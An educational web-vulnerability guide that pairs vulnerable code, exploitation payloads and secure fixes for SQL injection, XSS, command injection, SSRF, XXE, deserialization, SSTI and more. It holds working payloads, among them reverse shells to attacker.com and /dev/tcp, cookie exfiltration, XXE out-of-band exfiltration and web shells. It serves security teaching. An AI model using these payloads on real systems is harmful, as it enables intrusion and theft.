🔓 Complete Vulnerability & Exploitation Guide

Comprehensive guide covering all major web vulnerabilities with exploitation techniques and secure code examples

⚠️ WARNING: This document is for educational purposes only. Use it only against systems you are authorised to test and within the law.


📋 Contents

  1. SQL Injection
  2. Cross-Site Scripting (XSS)
  3. Cross-Site Request Forgery (CSRF)
  4. Command Injection
  5. Path Traversal
  6. Local File Inclusion (LFI)
  7. Remote File Inclusion (RFI)
  8. Server-Side Request Forgery (SSRF)
  9. XML External Entity (XXE)
  10. Insecure Deserialization
  11. Authentication Bypass
  12. Session Management
  13. Broken Access Control
  14. Server-Side Template Injection (SSTI)
  15. NoSQL Injection
  16. LDAP Injection
  17. Insecure Direct Object Reference (IDOR)
  18. Business Logic Flaws
  19. Race Conditions
  20. Additional Vulnerabilities (Open Redirect, HTTP Header Injection, Mass Assignment)


1. SQL Injection

❌ Vulnerable Code

PHP
<?php
$username = $_GET['user'];
$query = "SELECT * FROM users WHERE username = '$username'";
$result = mysqli_query($conn, $query);
?>

💣 Exploitation

BASH
# Boolean-based (the OR makes the WHERE clause true for every row)
?user=admin' OR '1'='1

# Union-based (column count must match the original SELECT; the trailing
# comment swallows the closing quote the application appends)
?user=admin' UNION SELECT 1,2,3,password,5 FROM users--

# Time-based blind (SLEEP() is MySQL; PostgreSQL uses pg_sleep(), MSSQL WAITFOR DELAY)
?user=admin' AND SLEEP(5)--

# Error-based (CONVERT(int, ...) is MSSQL syntax; MySQL needs a different error trick such as extractvalue())
?user=admin' AND 1=CONVERT(int,(SELECT @@version))--

# Stacked queries (mysqli_query() executes a single statement; this needs
# mysqli_multi_query() or a driver that allows multiple statements)
?user=admin'; DROP TABLE users--

# Note on MySQL: "--" is only a comment when followed by whitespace, so in a URL
# use --%20, "-- -" or "#" instead of a bare "--".

✅ Secure Code

PHP
<?php
$stmt = $conn->prepare("SELECT * FROM users WHERE username = ?");
$stmt->bind_param("s", $_GET['user']);
$stmt->execute();
$result = $stmt->get_result();
?>
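The two PHP snippets above, replayed against an in-memory SQLite database so the effect is observable offline. This is an added example, not code from the original page: the table, the three user rows and the column names are constructed for the demo, and `vulnerable_lookup` mirrors the string-built query while `safe_lookup` mirrors the prepared statement.

```python
"""Added example (not from the original page): string-built vs parameterised
query from section 1, run against a throwaway SQLite table."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (2, "alice", "hunter2"), (3, "bob", "pass")],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, username: str) -> list:
    """Mirrors the PHP: user input is spliced straight into the SQL text,
    so quotes in the input rewrite the query."""
    query = f"SELECT id, username FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def safe_lookup(conn: sqlite3.Connection, username: str) -> list:
    """Parameterised: the value travels separately from the SQL, so it is
    always compared as data and can never change the query's structure."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    ).fetchall()


def demo() -> dict:
    conn = make_db()
    boolean_payload = "admin' OR '1'='1"
    # UNION must select the same number of columns as the original SELECT (2 here);
    # the '--' comments out the quote the application appends after the input.
    union_payload = "x' UNION SELECT id, password FROM users--"
    return {
        "vulnerable_boolean": vulnerable_lookup(conn, boolean_payload),
        "vulnerable_union": vulnerable_lookup(conn, union_payload),
        "safe_boolean": safe_lookup(conn, boolean_payload),
        "safe_legit": safe_lookup(conn, "alice"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The boolean payload makes the vulnerable query return every row, and the UNION payload pulls the password column into a response that was only meant to show usernames; the parameterised lookup returns nothing for the same input because it searches for a user literally named `admin' OR '1'='1`.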

2. Cross-Site Scripting (XSS)

❌ Vulnerable Code

PHP
<?php
echo "Hello " . $_GET['name'];
?>

💣 Exploitation

Reflected XSS

HTML
?name=<script>alert(document.cookie)</script>
?name=<img src=x onerror=alert(1)>
?name=<svg/onload=alert(1)>

Stored XSS

HTML
<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>
DOM-based XSS

JAVASCRIPT
// Vulnerable JS
document.write(location.hash.substring(1));

// Exploit (payload placed in the URL fragment, which never reaches the server)
#<img src=x onerror=alert(1)>

XSS Bypass Techniques

HTML
<!-- Filter bypass -->
<ScRiPt>alert(1)</sCrIpT>
<script>alert(String.fromCharCode(88,83,83))</script>
<iframe src="javascript:alert(1)">
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>

✅ Secure Code

PHP
<?php
echo "Hello " . htmlspecialchars($_GET['name'], ENT_QUOTES, 'UTF-8');
?>

3. Cross-Site Request Forgery (CSRF)

❌ Vulnerable Code

PHP
<?php
if ($_GET['action'] == 'delete') {
    $id = $_GET['id'];
    mysqli_query($conn, "DELETE FROM posts WHERE id = $id");
}
?>

💣 Exploitation

HTML
<!-- Attacker's page -->
<img src="https://victim.com/delete.php?action=delete&id=123">

<!-- Hidden form auto-submit -->
<form action="https://bank.com/transfer" method="POST" id="csrf">
    <input name="to" value="attacker">
    <input name="amount" value="10000">
</form>
<script>document.getElementById('csrf').submit();</script>

✅ Secure Code

PHP
<?php
session_start();

// Generate one token per session
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// Verify on every state-changing request: a missing token fails, and the
// comparison is constant-time (a plain !== on a secret leaks timing)
if (!isset($_POST['csrf_token']) ||
    !hash_equals($_SESSION['csrf_token'], $_POST['csrf_token'])) {
    die('CSRF token validation failed');
}

// Embed the token as a hidden field in each form:
echo '<input type="hidden" name="csrf_token" value="' . htmlspecialchars($_SESSION['csrf_token']) . '">';

// Use POST for state changes (the GET-triggered delete above is forgeable with an <img>)
// and set SameSite on the session cookie as a second layer.
?>

4. Command Injection

❌ Vulnerable Code

PHP
<?php
$ip = $_GET['ip'];
system("ping -c 4 " . $ip);
?>

💣 Exploitation

BASH
# Basic
?ip=127.0.0.1; whoami

# Command chaining
?ip=127.0.0.1 && cat /etc/passwd
?ip=127.0.0.1 | ls -la
?ip=127.0.0.1; nc -e /bin/sh attacker.com 4444

# Bypass filters
?ip=127.0.0.1`whoami`
?ip=127.0.0.1$(whoami)
?ip=127.0.0.1%0awhoami

# Reverse shell
?ip=127.0.0.1; bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

✅ Secure Code

PHP
<?php
$ip = $_GET['ip'];
if (filter_var($ip, FILTER_VALIDATE_IP)) {
    $escaped = escapeshellarg($ip);
    system("ping -c 4 $escaped");
} else {
    die('Invalid IP');
}
?>

5. Path Traversal

❌ Vulnerable Code

PHP
<?php
$file = $_GET['file'];
include("/var/www/html/pages/" . $file);
?>

💣 Exploitation

BASH
# Basic
?file=../../../../etc/passwd

# Null byte injection (old PHP)
?file=../../../../etc/passwd%00

# URL encoding
?file=..%2f..%2f..%2f..%2fetc%2fpasswd

# Double encoding
?file=..%252f..%252f..%252fetc%252fpasswd

# Windows
?file=../../../../windows/win.ini
?file=..\..\..\..\windows\win.ini

✅ Secure Code

PHP
<?php
$file = basename($_GET['file']); // Remove directory paths
$allowed = ['home.php', 'about.php', 'contact.php'];

if (in_array($file, $allowed)) {
    include("/var/www/html/pages/" . $file);
} else {
    die('Invalid file');
}
?>

6. Local File Inclusion (LFI)

❌ Vulnerable Code

PHP
<?php
$page = $_GET['page'];
include($page . ".php");
?>

💣 Exploitation

BASH
# Basic LFI (the app appends ".php", so this only works where a null byte
# truncates the name, i.e. PHP < 5.3.4, or where no suffix is appended)
?page=../../../../etc/passwd

# PHP wrapper - read source as Base64 (omit ".php": the app adds it, and the
# filter returns the encoded source instead of executing it)
?page=php://filter/convert.base64-encode/resource=index

# PHP wrapper - Expect (only if the expect extension is installed)
?page=expect://whoami

# Data wrapper (requires allow_url_include=On)
?page=data://text/plain,<?php system($_GET['cmd']); ?>

# Log poisoning
# 1. Poison Apache log (the User-Agent lands in access.log; the path varies by distro)
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com
# 2. Include log
?page=../../../../var/log/apache2/access.log&cmd=whoami

# Session file inclusion (session.save_path is often /var/lib/php/sessions rather than /tmp;
# the session must first be seeded with PHP code through some stored value)
?page=../../../../tmp/sess_[SESSION_ID]

# /proc/self/environ (only useful when the environment is readable by the web
# server and a request header such as User-Agent is reflected into it)
?page=../../../../proc/self/environ

✅ Secure Code

PHP
<?php
$allowed = ['home', 'about', 'contact'];
$page = $_GET['page'];

if (in_array($page, $allowed)) {
    include($page . ".php");
} else {
    die('Invalid page');
}
?>
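Sections 5 and 6 both fix the problem with an allowlist of page names, which is the right answer when the set of files is small. When an application genuinely has to serve arbitrary files from one directory, the check has to be made on the resolved path. The following is an added example, not code from the original page: a resolver that decodes the encoded and double-encoded forms listed above, rejects null bytes and absolute paths, and then verifies that the real path still lies under the base directory. The base directory (a temporary directory) and the page names are constructed for the demo.

```python
"""Added example (not from the original page): containing a user-supplied
file name under a base directory, tested against the traversal forms from
sections 5 and 6."""
import os
import tempfile
from urllib.parse import unquote


def safe_join(base_dir: str, user_path: str, max_decodes: int = 2) -> str:
    """Return an absolute path inside base_dir, or raise ValueError.

    The decision is made on the *resolved* path: realpath() follows symlinks
    and collapses '..', so it does not matter how the traversal was spelled.
    """
    decoded = user_path
    # Undo double (or deeper) URL encoding so '..%252f' is judged as '../'.
    for _ in range(max_decodes):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:
        raise ValueError("null byte in path")
    # Treat backslashes as separators, as a Windows host would.
    decoded = decoded.replace("\\", "/")
    if decoded.startswith("/"):
        raise ValueError("absolute paths are not allowed")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, decoded))
    # commonpath() is used instead of startswith() so that /var/www/pages-old
    # is not mistaken for a child of /var/www/pages.
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return target


def classify(base_dir: str, candidates: list) -> dict:
    """Map each candidate to 'ok' or 'rejected'."""
    verdicts = {}
    for c in candidates:
        try:
            safe_join(base_dir, c)
            verdicts[c] = "ok"
        except ValueError:
            verdicts[c] = "rejected"
    return verdicts


# The payloads from sections 5 and 6 plus two legitimate names (constructed).
PAYLOADS = [
    "home.php",
    "sub/about.php",
    "../../../../etc/passwd",
    "../../../../etc/passwd%00",
    "..%2f..%2f..%2f..%2fetc%2fpasswd",
    "..%252f..%252f..%252fetc%252fpasswd",
    "..\\..\\..\\..\\windows\\win.ini",
    "/etc/passwd",
]


def run_demo() -> dict:
    with tempfile.TemporaryDirectory() as base:
        return classify(base, PAYLOADS)


if __name__ == "__main__":
    for payload, verdict in run_demo().items():
        print(f"{verdict:8} {payload}")
```

Note that the decode loop exists only because the web server or framework may already have decoded the value once; if the application receives the raw query string it should decode exactly as many times as the server does and no more, otherwise a literal `%2f` in a legitimate file name is mangled.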

7. Remote File Inclusion (RFI)

❌ Vulnerable Code

PHP
<?php
// php.ini: allow_url_include = On
$page = $_GET['page'];
include($page);
?>

💣 Exploitation

BASH
# Basic RFI
?page=http://attacker.com/shell.txt

# FTP wrapper
?page=ftp://attacker.com/shell.txt

# SMB wrapper (Windows)
?page=\\attacker.com\share\shell.txt

# Bypass filters
?page=http://attacker.com/shell.txt?
?page=http://attacker.com/shell.txt#

shell.txt content:

PHP
<?php system($_GET['cmd']); ?>

✅ Secure Code

PHP
<?php
// php.ini: allow_url_include = Off
$allowed = ['home', 'about', 'contact'];
$page = basename($_GET['page']);

if (in_array($page, $allowed)) {
    include(__DIR__ . "/pages/" . $page . ".php");
}
?>

8. Server-Side Request Forgery (SSRF)

❌ Vulnerable Code

PHP
<?php
$url = $_GET['url'];
$content = file_get_contents($url);
echo $content;
?>

💣 Exploitation

BASH
# Internal network scan
?url=http://localhost:8080
?url=http://127.0.0.1/admin
?url=http://192.168.1.1

# Cloud metadata
?url=http://169.254.169.254/latest/meta-data/
?url=http://169.254.169.254/latest/user-data/

# File protocol
?url=file:///etc/passwd

# Port scanning
?url=http://internal-server:22
?url=http://internal-server:3306

# Bypass filters
?url=http://127.1
?url=http://[::1]
?url=http://2130706433 (decimal IP)
?url=http://0x7f000001 (hex IP)

✅ Secure Code

PHP
<?php
$url = $_GET['url'];
$parsed = parse_url($url);

// A host-name blocklist is defeated by every bypass listed above (127.1, decimal and
// hex IPs, a DNS name that resolves to an internal address, a redirect). Validate the
// address the request will actually go to, then pin the connection to it.
if ($parsed === false || empty($parsed['host']) ||
    !in_array($parsed['scheme'] ?? '', ['http', 'https'], true)) {
    die('Invalid URL');
}

$host = $parsed['host'];
$ips = filter_var($host, FILTER_VALIDATE_IP) ? [$host] : (gethostbynamel($host) ?: []);
if (!$ips) {
    die('Unresolvable host'); // IPv6 literals/AAAA records need the same treatment via dns_get_record()
}
foreach ($ips as $ip) {
    // rejects 10/8, 172.16/12, 192.168/16 (private) and 0/8, 127/8, 169.254/16, 240/4 (reserved)
    if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
        die('Blocked');
    }
}

$port = $parsed['port'] ?? ($parsed['scheme'] === 'https' ? 443 : 80);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);                       // a redirect to 127.0.0.1 would skip the check
curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS); // no file://, gopher://, dict://
curl_setopt($ch, CURLOPT_RESOLVE, ["$host:$port:{$ips[0]}"]);          // connect to the IP we checked (DNS rebinding)
echo curl_exec($ch);
?>
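The bypass list above is really a list of ways to spell an address. The following is an added example, not code from the original page: a destination check that parses every IPv4 spelling the way `inet_aton` does (shortened `127.1`, decimal, hex, leading-zero octal), unwraps IPv4-mapped IPv6, and, for host names, resolves with `getaddrinfo` and checks every returned address. The `resolver` parameter exists so the logic can be tested with a constructed resolver instead of live DNS; the sample URLs are constructed.

```python
"""Added example (not from the original page): deciding whether an outbound
fetch may go to a user-supplied URL, resistant to the spellings in section 8."""
import ipaddress
import socket
from urllib.parse import urlsplit


def parse_ipv4_legacy(text: str):
    """Parse an IPv4 literal with inet_aton semantics: 1-4 dot-separated parts,
    each decimal, 0x-hex or leading-0 octal, the last part filling the remaining
    bytes. Returns the 32-bit integer, or None if text is not such a literal."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for p in parts:
        try:
            if p[:2].lower() == "0x":
                values.append(int(p[2:], 16))
            elif len(p) > 1 and p[0] == "0":
                values.append(int(p, 8))
            elif p.isdigit():
                values.append(int(p))
            else:
                return None
        except ValueError:
            return None
    *lead, last = values
    if any(v > 255 for v in lead) or last >= 256 ** (4 - len(lead)):
        return None
    addr = last
    for i, v in enumerate(lead):
        addr |= v << (8 * (3 - i))
    return addr


def canonical_ip(host: str):
    """IP literal in any accepted form -> ipaddress object; host name -> None."""
    if ":" in host:
        try:
            return ipaddress.ip_address(host)
        except ValueError:
            return None
    n = parse_ipv4_legacy(host)
    return ipaddress.IPv4Address(n) if n is not None else None


def is_forbidden(ip) -> bool:
    """True for anything that is not a routable public address."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 -> 127.0.0.1
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_url(url: str, resolver=socket.getaddrinfo) -> str:
    """Return the address the fetch should be pinned to, or raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname  # lower-cased, IPv6 brackets already stripped
    if not host:
        raise ValueError("no host in URL")
    literal = canonical_ip(host)
    if literal is not None:
        addrs = [literal]
    else:
        port = parts.port or (443 if parts.scheme == "https" else 80)
        addrs = [ipaddress.ip_address(r[4][0]) for r in resolver(host, port)]
    for ip in addrs:
        if is_forbidden(ip):
            raise ValueError(f"{url}: destination {ip} is not allowed")
    return str(addrs[0])


def is_allowed(url: str, resolver=socket.getaddrinfo) -> bool:
    """Boolean wrapper around check_url for callers that only need a verdict."""
    try:
        check_url(url, resolver)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for u in ["http://8.8.8.8/", "http://127.1/", "http://0x7f000001/", "http://2130706433/",
              "http://[::1]/", "http://169.254.169.254/latest/meta-data/", "file:///etc/passwd"]:
        try:
            print("allow ", u, "->", check_url(u))
        except ValueError as e:
            print("reject", e)
```

The returned address is meant to be the one the HTTP client actually connects to (curl's `CURLOPT_RESOLVE`, or a custom connection adapter in other clients); checking a name and then letting the client resolve it again reopens the DNS-rebinding window. Redirects must either be disabled or re-checked hop by hop with the same function.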

9. XML External Entity (XXE)

❌ Vulnerable Code

PHP
<?php
$xml = simplexml_load_string($_POST['xml']);
echo $xml;
?>

💣 Exploitation

Basic XXE

XML
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
    <data>&xxe;</data>
</root>

Blind XXE (OOB)

XML
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
%remote;
%init;
%trick;
]>
<root></root>

evil.dtd:

XML
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % init "<!ENTITY &#37; trick SYSTEM 'http://attacker.com/?data=%file;'>">

SSRF via XXE

XML
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://internal-server/admin">
]>
<root>&xxe;</root>

✅ Secure Code

PHP
<?php
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true); // needed before 8.0; deprecated no-op on 8.0+, where loading is off by default
}
// Never pass LIBXML_NOENT or LIBXML_DTDLOAD here: NOENT turns entity substitution ON.
// LIBXML_NONET additionally forbids network access while parsing.
$xml = simplexml_load_string($_POST['xml'], 'SimpleXMLElement', LIBXML_NONET);
?>

10. Insecure Deserialization

❌ Vulnerable Code

PHP
<?php
class User {
    public $isAdmin = false;
    public $command;

    // Magic methods (__destruct, __wakeup, __toString, ...) run on whatever
    // object the attacker chose to serialize, with attacker-chosen properties
    public function __destruct() {
        if ($this->isAdmin) {
            system($this->command);
        }
    }
}

$data = unserialize($_COOKIE['user']); // class and every property come from the cookie
?>

💣 Exploitation

PHP
<?php
class User {
    public $isAdmin = true;
    public $command = "whoami";
}

$payload = serialize(new User());
echo base64_encode($payload);
// Send as cookie
?>

Python Pickle

PYTHON
import pickle
import base64
import os

class RCE:
    def __reduce__(self):
        return (os.system, ('whoami',))

payload = pickle.dumps(RCE())
print(base64.b64encode(payload))

✅ Secure Code

PHP
<?php
// Use JSON instead: json_decode() never instantiates classes
$data = json_decode($_COOKIE['user'], true);

// If serialize() output must be accepted, forbid object creation outright
$data = unserialize($_COOKIE['user'], ['allowed_classes' => false]);

// Or sign serialized data ...
$serialized = serialize($data);
$signature = hash_hmac('sha256', $serialized, SECRET_KEY);
$safe_data = base64_encode($serialized . '|' . $signature);

// ... and verify BEFORE calling unserialize(). The hex signature contains no '|',
// so split at the last one (the serialized payload itself may contain '|').
$raw = base64_decode($_COOKIE['user'], true);
$pos = ($raw === false) ? false : strrpos($raw, '|');
if ($pos === false ||
    !hash_equals(hash_hmac('sha256', substr($raw, 0, $pos), SECRET_KEY), substr($raw, $pos + 1))) {
    die('Invalid signature');
}
$data = unserialize(substr($raw, 0, $pos), ['allowed_classes' => ['User']]); // only the classes you expect
?>
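The secure snippet above shows how to sign a cookie but not how the server checks it on the way back in, and the check is where most implementations go wrong. The following is an added example, not code from the original page: a sealed cookie whose payload is JSON (so nothing is ever instantiated), whose tag is HMAC-SHA256 over the exact payload bytes, and whose verification is a fixed-length, constant-time comparison done before the payload is parsed. `forge_admin` plays the attacker who edits the payload without the key. The key and the user record are constructed for the demo.

```python
"""Added example (not from the original page): sign-and-verify for a
serialised cookie, the verify half that section 10's secure code omits."""
import base64
import binascii
import hashlib
import hmac
import json

SECRET_KEY = b"constructed-demo-key-replace-with-32-random-bytes"  # assumption for the demo
_TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def seal(data: dict, key: bytes = SECRET_KEY) -> str:
    """Serialise to canonical JSON and append the HMAC tag (fixed 32 bytes)."""
    body = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(body + b"|" + tag).decode()


def unseal(token: str, key: bytes = SECRET_KEY) -> dict:
    """Check the tag first; only then hand the body to the JSON parser."""
    try:
        raw = base64.urlsafe_b64decode(token.encode())
    except (ValueError, binascii.Error):
        raise ValueError("malformed token")
    # The tag is raw bytes and may itself contain '|', so split by length, not by separator.
    if len(raw) < _TAG_LEN + 1 or raw[-_TAG_LEN - 1:-_TAG_LEN] != b"|":
        raise ValueError("malformed token")
    body, tag = raw[:-_TAG_LEN - 1], raw[-_TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):  # constant-time
        raise ValueError("bad signature")
    return json.loads(body)


def forge_admin(token: str) -> str:
    """What an attacker without the key can do: edit the payload, reuse the old tag."""
    raw = base64.urlsafe_b64decode(token.encode())
    body, tag = raw[:-_TAG_LEN - 1], raw[-_TAG_LEN:]
    data = json.loads(body)
    data["isAdmin"] = True
    forged = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    return base64.urlsafe_b64encode(forged + b"|" + tag).decode()


if __name__ == "__main__":
    cookie = seal({"user": "alice", "isAdmin": False})
    print("valid  ->", unseal(cookie))
    try:
        unseal(forge_admin(cookie))
    except ValueError as e:
        print("forged ->", e)
```

Signing protects integrity, not confidentiality: anyone can base64-decode the cookie and read the payload, so secrets do not belong in it. The scheme also only holds while the key stays on the server; if the key leaks, the attacker can mint their own admin cookies, and the `unserialize` gadget problem returns wherever the payload format allows objects.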

11. Authentication Bypass

❌ Vulnerable Code

PHP
<?php
$username = $_POST['username'];
$password = $_POST['password'];

$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysqli_query($conn, $query);

if (mysqli_num_rows($result) > 0) {
    $_SESSION['logged_in'] = true;
}
?>

💣 Exploitation

BASH
# SQL Injection auth bypass (closes the quote and makes the WHERE clause always true)
username: admin' OR '1'='1
password: anything

# NoSQL injection (JSON body: {"$ne": null} matches any stored password)
username: admin
password: {"$ne": null}

# Type juggling (PHP < 8): if the stored hash is compared with == instead of
# password_verify(), a hash of the form "0e<digits>" is treated as the number 0,
# so the literal 0 (or any input whose hash also starts with "0e") matches
password: 0 (if stored hash starts with "0e")

# Default credentials
admin:admin
root:root
admin:password123

✅ Secure Code

PHP
<?php
$stmt = $conn->prepare("SELECT * FROM users WHERE username = ?");
$stmt->bind_param("s", $_POST['username']);
$stmt->execute();
$result = $stmt->get_result();
$user = $result->fetch_assoc();

if ($user && password_verify($_POST['password'], $user['password'])) {
    $_SESSION['logged_in'] = true;
}
?>

12. Session Management

❌ Vulnerable Code

PHP
<?php
// No session regeneration
session_start();
if ($_POST['username'] == 'admin') {
    $_SESSION['user'] = 'admin';
}

// Predictable session ID
session_id(md5($_SERVER['REMOTE_ADDR']));
?>

💣 Exploitation

Session Fixation

HTML
<!-- Attacker sends victim -->
http://target.com/login.php?PHPSESSID=attacker_session_id

Session Hijacking

BASH
# Steal session cookie via XSS
<script>fetch('http://attacker.com/?s='+document.cookie)</script>

# Session prediction
# If sessions are: sess_1001, sess_1002, sess_1003
# Try: sess_1004, sess_1005...

✅ Secure Code

PHP
<?php
session_start([
    'cookie_httponly' => true,
    'cookie_secure' => true,
    'cookie_samesite' => 'Strict',
    'use_strict_mode' => true   // refuse session IDs the server never issued (defeats fixation)
]);

// $login_ok comes from a real credential check (see section 11), not a username compare
if ($login_ok) {
    session_regenerate_id(true); // fresh ID on privilege change, old one deleted
    $_SESSION['user'] = $username;
    $_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'] ?? '';
}

// Fingerprint check. Binding the session to REMOTE_ADDR is stronger but logs out
// mobile and NAT users whenever their address changes; choose per threat model.
if (isset($_SESSION['user_agent']) &&
    $_SESSION['user_agent'] !== ($_SERVER['HTTP_USER_AGENT'] ?? '')) {
    session_unset();
    session_destroy();
}
?>

13. Broken Access Control

❌ Vulnerable Code

PHP
<?php
// Direct object reference without auth check
$user_id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = $user_id";
$result = mysqli_query($conn, $query);
?>

💣 Exploitation

BASH
# IDOR
/profile.php?id=1  # Your profile
/profile.php?id=2  # Someone else's profile

# Horizontal privilege escalation
/api/user/123/orders  # Your orders
/api/user/456/orders  # Victim's orders

# Vertical privilege escalation
/admin/panel  # Access without admin role

✅ Secure Code

PHP
<?php
session_start();

$user_id = (int)$_GET['id'];
$current_user = (int)$_SESSION['user_id'];
$is_admin = !empty($_SESSION['is_admin']);

// Authorization decided server-side on every request: owner or admin only
if ($user_id !== $current_user && !$is_admin) {
    http_response_code(403);
    die('Access denied');
}

$stmt = $conn->prepare("SELECT * FROM users WHERE id = ?");
$stmt->bind_param("i", $user_id);
$stmt->execute();
?>

14. Server-Side Template Injection (SSTI)

❌ Vulnerable Code

PYTHON
# Flask/Jinja2
from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route('/hello')
def hello():
    name = request.args.get('name', '')
    # Input is concatenated into the template SOURCE, so {{ ... }} in it is evaluated
    template = f"<h1>Hello {name}</h1>"
    return render_template_string(template)

💣 Exploitation

Jinja2 (Python)

PYTHON
# RCE payload (reaches os through the globals of a function on Flask's config object)
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}

# Alternative via the subclass list: the index of subprocess.Popen differs per
# interpreter build, so list {{''.__class__.__mro__[1].__subclasses__()}} first
{{''.__class__.__mro__[1].__subclasses__()[396]('whoami',shell=True,stdout=-1).communicate()}}

# File read (Python 3: str's MRO is (str, object), so object is __mro__[1], not [2];
# the index of a file-like class is likewise build-specific)
{{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}

Twig (PHP)

PHP
{{_self.env.registerUndefinedFilterCallback("system")}}
{{_self.env.getFilter("whoami")}}

FreeMarker (Java)

JAVA
<#assign ex="freemarker.template.utility.Execute"?new()>
${ex("whoami")}

✅ Secure Code

PYTHON
from flask import Flask, request, render_template

app = Flask(__name__)

@app.route('/hello')
def hello():
    name = request.args.get('name', '')
    # Pass input as template DATA: hello.html contains "Hello {{ name }}", and Flask
    # autoescapes .html templates, so the value is never parsed as template code
    return render_template('hello.html', name=name)

15. NoSQL Injection

❌ Vulnerable Code

JAVASCRIPT
// MongoDB
const username = req.body.username;
const password = req.body.password;

db.collection('users').findOne({
    username: username,
    password: password
});

💣 Exploitation

JSON
// Authentication bypass: the password field becomes an operator object (needs a JSON
// body, or extended form parsing such as Express's qs, where password[$ne]= does the same)
{
    "username": "admin",
    "password": {"$ne": null}
}

// Match several accounts at once. $or is only valid at the top level of a query,
// so inside a single field the equivalent is $in
{
    "username": {"$in": ["admin", "user"]},
    "password": {"$ne": null}
}

// Regex injection (enumerate usernames, or brute-force a password one character at a time)
{
    "username": {"$regex": "^admin"},
    "password": {"$gt": ""}
}

// JavaScript injection: $where is also top-level only, so it applies when the
// application itself builds a $where string from input, e.g.
//   db.collection('users').findOne({ $where: "this.username == '" + username + "'" })
// username: admin' || '1'=='1

✅ Secure Code

JAVASCRIPT
const bcrypt = require('bcrypt');
const { username, password } = req.body;

// Reject anything that is not a plain string BEFORE it reaches the query.
// (String({"$ne": null}) silently becomes "[object Object]", so casting is not a check.)
if (typeof username !== 'string' || typeof password !== 'string') {
    return res.status(400).send('Invalid input');
}

// Look up by username only and verify the password hash in application code
const user = await db.collection('users').findOne({ username: username });
if (!user || !(await bcrypt.compare(password, user.passwordHash))) {
    return res.status(401).send('Invalid credentials');
}

16. LDAP Injection

❌ Vulnerable Code

PHP
<?php
$username = $_POST['username'];
$password = $_POST['password'];

$filter = "(&(uid=$username)(userPassword=$password))";
$result = ldap_search($ldap, $base_dn, $filter);
?>

💣 Exploitation

BASH
# Authentication bypass
username: *)(uid=*))(|(uid=*
password: anything

# Result: (&(uid=*)(uid=*))(|(uid=*)(userPassword=anything))

# Enumerate users
username: admin*
username: admi*
username: test*

# Bypass with OR
username: *)(|(objectClass=*

✅ Secure Code

PHP
<?php
// PHP >= 5.6 ships ldap_escape(); redefining it is a fatal "Cannot redeclare" error.
// For a filter value it escapes \ -> \5c, * -> \2a, ( -> \28, ) -> \29, NUL -> \00
$username = ldap_escape($_POST['username'], '', LDAP_ESCAPE_FILTER);
$password = $_POST['password'];

// Keep the password out of the filter entirely: find the DN, then let the directory
// verify the password with a bind. An empty password must be rejected explicitly,
// because many servers treat a bind with an empty password as an anonymous bind.
$result = ldap_search($ldap, $base_dn, "(uid=$username)", ['dn']);
$entries = ldap_get_entries($ldap, $result);
if ($password === '' || $entries['count'] !== 1 ||
    @ldap_bind($ldap, $entries[0]['dn'], $password) === false) {
    die('Invalid credentials');
}
?>
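Filter-value escaping is small enough to get wrong, and the page's own helper shows how (a function name that collides with a builtin, and chained replaces that can double-escape). The following is an added example, not code from the original page: a per-character escaper for the five filter metacharacters defined by RFC 4515, applied to the bypass payload from this section so the effect on the resulting filter is visible. The filter shape and attribute names follow the page; the sample credentials are constructed.

```python
"""Added example (not from the original page): RFC 4515 filter-value escaping,
checked against the LDAP injection payload from section 16."""

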